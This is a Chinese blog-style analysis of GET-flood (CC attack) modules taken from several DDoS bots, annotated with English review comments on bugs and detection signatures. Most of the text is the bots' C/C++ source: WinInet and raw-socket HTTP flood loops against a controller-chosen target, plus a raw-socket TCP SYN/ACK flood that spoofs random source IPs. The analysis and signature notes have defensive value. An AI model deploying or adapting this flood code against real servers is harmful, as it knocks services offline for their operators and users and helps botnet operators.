
[Visual Studio文章] 攻击模块分析-GET篇 



对现有的所能找到的DDOS代码(攻击模块)做出一次分析----GET篇
分析者:alalmn—飞龙       BLOG:http://hi.baidu.com/alalmn
分析的不好请各位高手见谅花了几个小时分析的呵呵

在这里不得不说 很多代码只写了界面 服务端没代码(把代码删除了) 要发就全部发了 重点自己藏着
这就是中国程序员的通病   一时半会没办法克服

实际中的HTTP GET攻击就是所谓的CC攻击(Challenge Collapsar,"挑战黑洞",得名于早期的抗DDoS产品Collapsar/黑洞)。
CC(HTTP GET flood)的定义可以用下面几句话进行描述:
1.利用代理服务器(或像下文分析的代码那样,利用受控的肉鸡/僵尸网络)向受害者发起大量HTTP GET请求
2.主要请求动态页面,涉及到数据库访问操作
3.数据库负载以及数据库连接池负载极高,无法响应正常请求,导致系统不可用。

//=================================================================================

NetBot_Attacker.h

/*
unsigned long CALLBACK nocache_get(LPVOID dParam) //HTTP 空GET请求   不缓存,每回重新请求页面!
unsigned long CALLBACK null_get(LPVOID dParam)   //缓存 Get Flood   空GET链接
客户机 HTTP 空GET请求=nocache_get            NoCache Get Flood(缓存 Get Flood)=null_get
但是我不这样认为 从他函数的意思 来看正好相反(估计是NB在发布代码的时候做手脚的 NB老爱玩小动作)
真正的意思是   HTTP 空GET请求=null_get       NoCache Get Flood(缓存 Get Flood)=nocache_get
(从下面的函数体也能印证:nocache_get 请求的是一个固定的乱码 .html 路径并带 Cache-Control: no-cache 头;null_get 请求的是空路径,即站点根。两者的 Referer 也不同:前者 www.baidu.com,后者 www.google.com,可作为检测特征。)


doHTTP 这个地方其实我觉得没必要这么麻烦
可以这样 send(m_hSocket,szBuffer,sizeof(szBuffer)    直接发送就好了(不知道效果一样不呵呵)
(注意:直接 send 需要自己完成 DNS 解析、TCP 连接、请求行和头部的拼装,而 doHTTP 通过 WinInet 自动处理这些并且会读取响应;另外长度应当用 strlen(szBuffer) 而不是 sizeof(szBuffer),否则会把缓冲区尾部的垃圾字节一起发出去。)
*/

// doHTTP - issue one HTTP request through WinInet and read (at most 999
// bytes of) the response, echoing it to stdout.
//
//   ServerName   host name or dotted IP handed to InternetConnect
//   port         TCP port
//   ActionFile   request target (path) handed to HttpOpenRequest
//   Method       HTTP verb ("GET" / "POST")
//   HttpHeaders  extra request headers, CRLF-terminated; must not be NULL
//                (it is strlen'd below)
//   FormData     request body; must not be NULL (also strlen'd)
//   returns      true if HttpSendRequest succeeded, false on any earlier failure
//
// wininet.dll is loaded at run time and every API is resolved with
// GetProcAddress instead of being linked statically - presumably to keep
// the WinInet imports out of the binary's import table (the code does not
// say why).  None of the GetProcAddress results is NULL-checked.
//
// NOTE(review): hRequest is only assigned inside the `if (hConnect!= NULL)`
// branch, so when InternetConnect fails the `if (hRequest)` test at the end
// reads an uninitialised pointer and may pass garbage to InternetCloseHandle.
// NOTE(review): the response is read synchronously, so each call blocks the
// calling thread until the target answers (or WinInet times out).
bool doHTTP(char* ServerName,DWORD port,char* ActionFile, char* Method,char* HttpHeaders, char* FormData)
{ // example call from the original: doHTTP("127.0.0.1",8080,"*(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html","GET","Cache-Control: no-cache\r\nReferer: http://www.baidu.com\r\n","");
HMODULE hDll;
LPVOID hSession,hConnect,hRequest;   // hRequest is NOT initialised - see NOTE above
bool bSendRequest=false;
char buf[1000];                      // response buffer (999 bytes + NUL)
DWORD dwFlags;                       // actually the bytes-read out-param of InternetReadFile

hDll = LoadLibrary("wininet.dll");
if(hDll)
{
   // function-pointer types matching the ANSI WinInet exports resolved below
   typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
   typedef LPVOID ( WINAPI * pInternetConnect ) ( LPVOID ,LPCTSTR ,WORD ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
   typedef LPVOID ( WINAPI * pHttpOpenRequest ) ( LPVOID ,LPCTSTR ,LPCTSTR ,LPCTSTR ,LPCTSTR ,LPCSTR FAR * ,DWORD ,DWORD);
   typedef BOOL ( WINAPI * pHttpSendRequest ) (LPVOID ,LPCSTR ,DWORD ,LPVOID,DWORD) ;
   typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
   typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );

   pInternetOpen InternetOpen=NULL;
   pInternetConnect InternetConnect=NULL;
   pHttpOpenRequest HttpOpenRequest=NULL;
   pHttpSendRequest HttpSendRequest=NULL;
   pInternetCloseHandle InternetCloseHandle=NULL;
   pInternetReadFile InternetReadFile=NULL;

   // dynamic import; a NULL here (wrong DLL, missing export) is never detected
   InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
   InternetConnect = (pInternetConnect ) GetProcAddress ( hDll, "InternetConnectA");
   HttpOpenRequest = (pHttpOpenRequest) GetProcAddress (hDll,"HttpOpenRequestA");
   HttpSendRequest = ( pHttpSendRequest ) GetProcAddress( hDll, "HttpSendRequestA" );
   InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
   InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");

   // open a WinInet session.  The agent string "Hackeroo" is sent as the
   // User-Agent header (a detection signature); access type 0 =
   // INTERNET_OPEN_TYPE_PRECONFIG, i.e. the machine's proxy settings are honoured.
   hSession = InternetOpen("Hackeroo",0, NULL, NULL, 0);
   if (hSession != NULL)
   {
    // connect to ServerName:port with no credentials; service 3 =
    // INTERNET_SERVICE_HTTP, flags 0, context value 1
    hConnect = InternetConnect(hSession,ServerName,(WORD)port, NULL, NULL, 3, 0, 1);
    if (hConnect!= NULL)
    {
     // build the request: caller's verb and path, HTTP/1.1, no referrer here
     // (any Referer arrives through HttpHeaders), accept any content type.
     // NOTE(review): dwFlags 0 leaves WinInet's local cache enabled, so a
     // repeated identical URL (null_get below) may be answered from the
     // client's own cache instead of reaching the target - confirm.
     LPTSTR AcceptTypes[2]={"*/*",NULL};
     hRequest = HttpOpenRequest(hConnect,Method,ActionFile,"HTTP/1.1",NULL,(LPCTSTR*)AcceptTypes,0, 1);
     if (hRequest!= NULL)
     {
      // send headers + body; strlen() on a NULL argument would crash
      bSendRequest =HttpSendRequest(hRequest,HttpHeaders,strlen(HttpHeaders),FormData,strlen(FormData));
      if (bSendRequest)
      {
       // read up to 999 bytes of the reply (blocking) and print it
       memset(buf,0,1000);
       InternetReadFile(hRequest, buf,999, &dwFlags);
       printf("%s",buf);
      }
     }
    }
    // release handles.  hRequest is uninitialised if hConnect was NULL (see NOTE above)
    if (hRequest)
     InternetCloseHandle(hRequest);
    if (hConnect)
     InternetCloseHandle(hConnect);
    if (hSession)
     InternetCloseHandle(hSession);
   }
   FreeLibrary(hDll);
}
return bSendRequest;
}


/***************************************************/
// nocache_get - thread body: flood the target named by fuckweb.FuckIP with
// GET requests for one fixed, garbage ".html" path plus
// "Cache-Control: no-cache" and "Referer: http://www.baidu.com", sleeping
// 40 ms between requests, until the global stopfuck flag is set.
// dParam is unused.  Always returns 0.
//
// Externals (defined elsewhere in the bot): fuckweb.FuckIP - target string
// from the controller in the form "[http://]host[:port][/path]";
// stopfuck - stop flag; doHTTP - WinInet helper above.
//
// NOTE(review): in this listing the URL parser is commented out, so `ip`
// (and `url`) are never written before doHTTP(ip, ...) is called - as
// shown, the function passes an uninitialised stack buffer as the host
// name.  The original bot presumably had the parser live, exactly as in
// null_get below.
// NOTE(review): even with the parser live, strcpy() into all[100] and the
// strncpy() lengths taken from strcspn() are not bounded by sizeof(ip)=32,
// sizeof(port)=6 or sizeof(url)=32, so a long target string from the
// controller overflows this thread's stack.
// NOTE(review): despite the original "re-request the page every time"
// comment, the path is a constant string literal - every request is
// byte-identical and the server sees the same (almost certainly 404) URL
// each time.  That fixed path, the "Hackeroo" User-Agent set in doHTTP and
// the baidu Referer are usable detection signatures.
// NOTE(review): doHTTP reads the reply synchronously, so one thread sends
// at most ~25 requests/s and far fewer against a slow target.
unsigned long CALLBACK nocache_get(LPVOID dParam) // original label: "HTTP empty GET request - no caching, re-request page every time"
{
char all[100],ip[32],port[6],url[32],*point=NULL;   // url is parsed but never used
int httpport=80;                                     // default port
strcpy(all,fuckweb.FuckIP); // unbounded copy of the controller-supplied target string
point=all;
/*
// analyst's remark: "I think this part is useless; the client should send
// it already parsed" - but with it removed `ip` is never filled in (see NOTE above).
if(strstr(all,"http://")!=NULL) // scheme present anywhere in the string...
{
    point=point+strlen("http://");// ...skip 7 characters from the start regardless of where it was found
}
if(strstr(point,":")!=NULL)// "host:port[/path]" form
{
   memset(ip,0,sizeof(ip));   // zero so a short strncpy is NUL-terminated
   strncpy(ip,point,strcspn(point,":"));   // host - length not bounded by sizeof(ip)
                 // strcspn = index of the first ':'
   point=point+strcspn(point,":")+1; // step past the ':'
   if(strstr(point,"/")!=NULL) // port is only parsed when a '/' follows it
   {
    memset(port,0,sizeof(port));
    strncpy(port,point,strcspn(point,"/"));   // length not bounded by sizeof(port)
    httpport=atoi(port);                       // bad port silently becomes 0
    point=point+strcspn(point,"/");
    memset(url,0,sizeof(url));
    strcpy(url,point); // unbounded copy of the remainder
   }
}
else
{
   if(strstr(point,"/")!=NULL) // "host/path" form; a bare "host" leaves ip unset
   {
    memset(ip,0,sizeof(ip));
    strncpy(ip,point,strcspn(point,"/"));
    point=point+strcspn(point,"/");
    memset(url,0,sizeof(url));
    strcpy(url,point);
   }
}
*/
while(!stopfuck)
{
     // one request per iteration; the path, headers and body are constants
     doHTTP(ip,
         httpport,
         "/*(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html",
         "GET",
         "Cache-Control: no-cache\r\nReferer: http://www.baidu.com\r\n",
         ""); // connect, send, read reply (blocking)
   Sleep(40);   // pacing
}
return 0;
}

// null_get - thread body: flood the target with "empty" GET requests (no
// path, i.e. the root resource) carrying "Cache-Control: no-cache" and
// "Referer: http://www.google.com", 40 ms apart, until stopfuck is set.
// dParam is unused.  Always returns 0.
//
// fuckweb.FuckIP is parsed as "[http://]host[:port][/path]":
//   - an "http://" prefix is skipped (strstr finds it anywhere, but the code
//     always skips the first seven characters);
//   - host goes to ip, the optional port to port/httpport (default 80), the
//     remainder to url - which is then never used: the request always has an
//     empty path;
//   - "host:port" with no trailing '/' leaves httpport at 80;
//   - a string with neither ':' nor '/' never writes ip at all.
//
// NOTE(review): strcpy() into all[100] and the strncpy() lengths from
// strcspn() are not bounded by sizeof(ip)=32 / sizeof(port)=6 /
// sizeof(url)=32; a long target string from the controller overflows the
// stack.  atoi() turns a malformed port into 0 silently.
// NOTE(review): an empty object name in HttpOpenRequest is, as far as I
// know, treated by WinInet as "/" - confirm.  doHTTP opens the request with
// dwFlags 0, so this identical URL may be served from the local WinInet
// cache rather than the target; the no-cache header only affects
// intermediaries/servers that honour it.
unsigned long CALLBACK null_get(LPVOID dParam)   // original label: "cached Get Flood - empty GET link"
{
char all[100],ip[32],port[6],url[32],*point=NULL;   // url is parsed but never used
int httpport=80;                                     // default port
strcpy(all,fuckweb.FuckIP);                          // unbounded copy of the controller-supplied target
point=all;
if(strstr(all,"http://")!=NULL)                      // scheme present anywhere...
{
    point=point+strlen("http://");                   // ...skip 7 chars from the start
}
if(strstr(point,":")!=NULL)                          // "host:port[/path]" form
{
   memset(ip,0,sizeof(ip));                          // zero so a short copy is NUL-terminated
   strncpy(ip,point,strcspn(point,":"));             // host; length not bounded by sizeof(ip)
   point=point+strcspn(point,":")+1;                 // step past ':'
   if(strstr(point,"/")!=NULL)                       // port only parsed when a '/' follows
   {
    memset(port,0,sizeof(port));
    strncpy(port,point,strcspn(point,"/"));          // length not bounded by sizeof(port)
    httpport=atoi(port);
    point=point+strcspn(point,"/");
    memset(url,0,sizeof(url));
    strcpy(url,point);                               // unbounded copy of the remainder
   }
}
else                                   // "host/path" form - same copies as above
{
   if(strstr(point,"/")!=NULL)
   {
    memset(ip,0,sizeof(ip));
    strncpy(ip,point,strcspn(point,"/"));
    point=point+strcspn(point,"/");
    memset(url,0,sizeof(url));
    strcpy(url,point);
   }
}

while(!stopfuck)
{
     // empty path -> root resource; headers and body are constants
     doHTTP(ip,
         httpport,
         "",
         "GET",
         "Cache-Control: no-cache\r\nReferer: http://www.google.com\r\n",
         "");
   Sleep(40);   // pacing
}
return 0;
}

//=================================================================================

暴风DDOS.h

// moni_flood - thread body: open a fresh TCP connection to tgtIP:tgtPort,
// send one hand-built "GET / HTTP/1.1" request, close the socket without
// reading the reply, sleep SleepTime ms; repeat until StopFlag == 1.
//
// Externals: zIP (target host string used for the Host and Referer
// headers), tgtIP / tgtPort (connect target), StopFlag, SleepTime,
// tcpConnect() (returns a connected SOCKET), rsCS() (presumably converts
// the C string to a CString - inferred from its use in the concatenation).
//
// The original comment calls this "IE cache"; it is a plain socket-level
// HTTP request and involves neither Internet Explorer nor WinInet.
//
// NOTE(review): tcpConnect's result is never checked, so when the connect
// fails send()/closesocket() are called on an invalid socket every
// iteration and the loop just spins at SleepTime.
// NOTE(review): the request is a distinctive signature: a bare "GET /" with
// a malformed Referer of the form "http://<host>:80/http://<host>",
// "Connection: Close" and "Cache-Control: no-cache", and the connection is
// torn down without reading the response.
void moni_flood() // original label: "IE cache"
{
CString url11,http,rhost;
http = zIP;
    rhost = http;                    // host string used in the headers below
char *jj = "/";                      // request path is always "/"

    // build the request once; the original comment notes a dynamic page such as
    // /list.asp?id=*** would be the real target, but this code always asks for "/"
    url11="GET "+rsCS(jj)+" HTTP/1.1\r\n"
                +"Referer: http://"+rhost+":80/http://"+rhost   // malformed Referer (see NOTE)
     +"\r\nHost: "+rhost    // Host header
     +"\r\nConnection: Close"   // one request per connection
     +"\r\nCache-Control: no-cache"
       +"\r\n\r\n";
   
    while (1)
{
   if (StopFlag == 1) // controller cleared the attack
   {
    ExitThread(0);
    return;          // unreachable after ExitThread
   }
     SOCKET S=tcpConnect(tgtIP,tgtPort);   // new TCP connection per request; result unchecked
   send(S,url11,url11.GetLength() ,0); // CString converts to LPCTSTR; return value ignored; reply never read
   closesocket(S);   // drop the connection immediately
   Sleep(SleepTime); // pacing
}
}

//=================================================================================

Maxer.h

// HTTP - thread body.  Despite the name and the original "HTTP cache
// attack" label, what this sends is a raw-socket TCP flood: bursts of 24
// packets every 40 ms, each a bare TCP header (SYN or ACK, 50/50) from a
// random spoofed source IP and random source port 0..1024 to
// ddosinfo.addr:ddosinfo.port, until IsStop == 1.
//
// The "GET / HTTP ..." / "POST / HTTP ..." text copied into szSendBuf at the
// top of each burst is overwritten by the header memcpy()s below (first
// 32, then 40 bytes), and ipHeader.total_len covers only IP + TCP headers,
// so no HTTP payload is ever declared in the packet.  Classify this as a
// spoofed SYN/ACK flood, not an HTTP flood.
//
// dParam: PDDOSINFO (target addr + port), copied by value into ddosinfo.
// Externals: DDOSINFO / IP_HEADER / TCP_HEADER / PSD_HEADER structs,
// resolve() (name -> network-order IPv4, inferred from use), checksum()
// (presumably the usual ones-complement sum), IsStop flag.
// Returns 0 on socket-setup failure; otherwise never returns normally (the
// stop path calls ExitThread).  Header sizes quoted below assume the
// conventional 20-byte IP_HEADER / 20-byte TCP_HEADER / 12-byte PSD_HEADER
// layouts - confirm against the project's definitions.
//
// NOTE(review): sendto() is given sizeof(szSendBuf) + sizeof(ipHeader) =
// 128 + 20 bytes while szSendBuf is only 128 bytes - it reads 20 bytes past
// the end of the buffer (undefined behaviour; stack contents leak into the
// packet).
// NOTE(review): the IP checksum computed at the end is never copied back
// into szSendBuf (the header was memcpy'd with checksum = 0 one line
// earlier), and it is computed over 40 bytes although the IP checksum
// covers only the IP header.  Whether the stack rewrites it under
// IP_HDRINCL is OS-dependent - confirm.
// NOTE(review): raw sockets with IP_HDRINCL need administrator rights, and
// Windows XP SP2 and later refuse to send TCP over raw sockets and to send
// with a spoofed source address - confirm against the target OS; on such
// hosts this thread sends nothing.
// NOTE(review): WSAStartup is called per thread and never matched by
// WSACleanup; sendSocket is never closed; srand() per thread with
// time(NULL) gives identical sequences to threads started in the same second.
DWORD WINAPI HTTP(LPVOID dParam)   // original label: "HTTP cache attack"
{
srand((unsigned)time( NULL ));   // per-thread PRNG seed

PDDOSINFO pddosinfo = (PDDOSINFO)dParam; // controller-supplied target description
DDOSINFO ddosinfo;                        // private copy
memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));// copy by value

WSADATA               WSAData;// Winsock startup info
WSAStartup(MAKEWORD(2,2) ,&WSAData);// Winsock 2.2; return value not checked
    SOCKET             sendSocket;
    SOCKADDR_IN        Sin; // destination address
    IP_HEADER          ipHeader;
    TCP_HEADER         tcpHeader;
    PSD_HEADER         psdHeader;
    char               szSendBuf[128]={0};   // scratch + packet buffer (see sendto NOTE)

    // raw IP socket: we supply the IP header ourselves (IP_HDRINCL below)
    if((sendSocket = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET)
    {
        printf("Socket Setup Error...\n");
        return 0;
    }
BOOL               flag=1;
    // tell the stack the buffer already contains an IP header
    if(setsockopt(sendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR)
    {
        printf("Setsockopt IP_HDRINCL Error...\n");
        return 0;
    }

    int timeout = 3000;
    // 3 s send timeout
    if(setsockopt(sendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) == SOCKET_ERROR)
    {
        printf("Setsockopt SO_SNDTIMEO Error...\n");
        return 0;
    }

Sin.sin_family = AF_INET; // IPv4
Sin.sin_port=htons(ddosinfo.port); // destination port, network byte order (the original comments for these two lines were swapped)
Sin.sin_addr.S_un.S_addr=resolve(ddosinfo.addr); // destination address via the project's resolve() helper

char         src_ip[20] = {0};   // dotted-quad text of the spoofed source

while(1)
    {
   if(IsStop==1)// controller cleared the attack
   {
    ExitThread(0);
    return 0;   // unreachable after ExitThread
   }


   // filler text - overwritten by the header copies below, never sent as HTTP
   if (rand()%2==0)
    strcpy(szSendBuf,"GET / HTTP GET / HTTP GET / HTTP GET / HTTP GET / HTTP");
   else
    strcpy(szSendBuf,"POST / HTTP POST / HTTP POST / HTTP POST / HTTP POST / HTTP");
  
   for(int a=0;a<24;a++)   // one burst of 24 packets
   {
    // random spoofed source address; each octet is 1..250
    wsprintf( src_ip, "%d.%d.%d.%d", rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 );
    // (analyst's remark: a fresh source IP per packet makes blocking by address hard)
    
    // IP header
    ipHeader.h_verlen = (4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); // version 4, IHL = header words (5 if 20-byte header; relies on 4-byte unsigned long)
    ipHeader.tos = 0;
    ipHeader.total_len = htons(sizeof(ipHeader)+sizeof(tcpHeader));   // IP + TCP headers only - no payload declared
    ipHeader.ident = 1; // constant identification
    ipHeader.frag_and_flags = 0x40;   // written as a host-order 16-bit value; on the wire this appears as DF set, offset 0 - verify against the struct's byte order
    ipHeader.ttl = 128;   // TTL
    ipHeader.proto = IPPROTO_TCP;   // protocol
    ipHeader.checksum = 0;   // zeroed for the checksum pass (see NOTE: the computed value never reaches the packet)
    ipHeader.sourceIP = inet_addr(src_ip);   // spoofed source
    ipHeader.destIP = Sin.sin_addr.s_addr; // target

    // TCP header
    tcpHeader.th_sport = htons(rand()%1025); // random source port 0..1024
    tcpHeader.th_dport = htons( ddosinfo.port ); // target port
    tcpHeader.th_seq = htonl( rand()%900000000 + 1 );   // random ISN
    tcpHeader.th_ack=rand()%3; // ack number 0..2, not byte-swapped (original comment claimed "set to 0")
    if (rand()%2 == 0) tcpHeader.th_flag=0x02;   // SYN
    else tcpHeader.th_flag=0x10;   // ACK (the original comment labelled both branches "SYN")
    tcpHeader.th_lenres = (sizeof(tcpHeader)/4<<4|0);   // data offset in words, reserved bits 0
    tcpHeader.th_win = htons(512);   // window
    tcpHeader.th_sum = 0;   // zeroed for the checksum pass
    tcpHeader.th_urp = 0;   // urgent pointer

    // pseudo-header: feeds the TCP checksum only, never transmitted
    psdHeader.saddr = ipHeader.sourceIP;    // spoofed source
    psdHeader.daddr = ipHeader.destIP;   // target
    psdHeader.mbz = 0;
    psdHeader.ptcl = IPPROTO_TCP;   // protocol
    psdHeader.tcpl = htons(sizeof(tcpHeader));    // TCP length (header only)

    // TCP checksum over pseudo-header + TCP header, using szSendBuf as scratch
    memcpy( szSendBuf, &psdHeader, sizeof(psdHeader) );
    memcpy( szSendBuf + sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader) );
    tcpHeader.th_sum = checksum( (USHORT *) szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader) );

    // lay out the real packet: IP header (checksum still 0) then TCP header (with th_sum)
    memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) );
    memcpy( szSendBuf + sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) );
    ipHeader.checksum = checksum( (USHORT *) szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader) );   // computed over 40 bytes and never copied into szSendBuf (see NOTE)

    // NOTE(review): length is 148 bytes for a 128-byte buffer - out-of-bounds read (see header)
    sendto(sendSocket, szSendBuf,sizeof(szSendBuf) + sizeof(ipHeader), 0, (struct sockaddr*)&Sin, sizeof(Sin));
   }
   Sleep(40);   // pause between bursts
}
    return 0;
}


// IE - thread body: every 50 s, open a WinInet session (User-Agent
// "CreateIE"), fetch the URL in ddosinfo.addr with InternetOpenUrl, read up
// to 999 bytes of the reply and discard it, until IsStop == 1.
//
// dParam: PDDOSINFO, copied by value; only ddosinfo.addr (expected to be a
// full URL, since it goes straight to InternetOpenUrl) is used.  Never
// returns normally - the stop path calls ExitThread and the `return 0`
// after it is unreachable.
//
// The 0x04000000 flag passed to InternetOpenUrl is, as far as I can tell,
// INTERNET_FLAG_NO_CACHE_WRITE (do not store the reply in the local cache)
// - verify against wininet.h.  It does not force a reload, so a previously
// cached copy may still be served without touching the target.
//
// WinInet is loaded and resolved dynamically exactly as in doHTTP above.
//
// NOTE(review): with Sleep(50000) each thread issues roughly one request
// per 50 seconds - as a "DDoS" this is negligible; it behaves more like a
// periodic probe.
// NOTE(review): hDll and the GetProcAddress results are not NULL-checked;
// if wininet.dll fails to load, the first InternetOpen call jumps to NULL.
// NOTE(review): retstr is set but never used; dwFlags is really the
// bytes-read out-param of InternetReadFile.
DWORD WINAPI IE(LPVOID dParam)
{
PDDOSINFO pddosinfo = (PDDOSINFO)dParam;   // controller-supplied target description
DDOSINFO ddosinfo;                          // private copy
memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));
HMODULE hDll;
LPVOID hInternet,hUrlHandle;
char buf[1000],*retstr=NULL;                // reply buffer; retstr unused
retstr=buf;
DWORD dwFlags;                              // bytes read

hDll = LoadLibrary("wininet.dll");          // result not checked
typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
typedef LPVOID ( WINAPI * pInternetOpenUrl ) ( LPVOID ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );
typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
pInternetOpen InternetOpen=NULL;
pInternetOpenUrl InternetOpenUrl=NULL;
pInternetCloseHandle InternetCloseHandle=NULL;
pInternetReadFile InternetReadFile=NULL;
// dynamic import of the ANSI WinInet entry points; results not checked
InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
InternetOpenUrl = (pInternetOpenUrl ) GetProcAddress ( hDll, "InternetOpenUrlA");
InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");

while (1)
{
   if (IsStop == 1)          // controller cleared the attack
   {
    FreeLibrary(hDll);
    ExitThread(0);
    return 0;                // unreachable after ExitThread
   }
   // new WinInet session per iteration; "CreateIE" becomes the User-Agent
   // (detection signature); access type 0 = use the machine's proxy settings
   hInternet = InternetOpen("CreateIE",0, NULL, NULL, 0);
   if (hInternet != NULL)
   {
    // fetch the target URL with no extra headers; flag 0x04000000 - see header comment
    hUrlHandle = InternetOpenUrl(hInternet, ddosinfo.addr, NULL, 0, 0x04000000, 0);
    if (hUrlHandle!= NULL)
    {
     memset(buf,0,1000);
     InternetReadFile(hUrlHandle, buf,999, &dwFlags); // read up to 999 bytes, then discard
     InternetCloseHandle(hUrlHandle);
     hUrlHandle = NULL;
    }
    InternetCloseHandle(hInternet);
    hInternet = NULL;
   }
   Sleep(50000);   // 50 s between requests
}
}

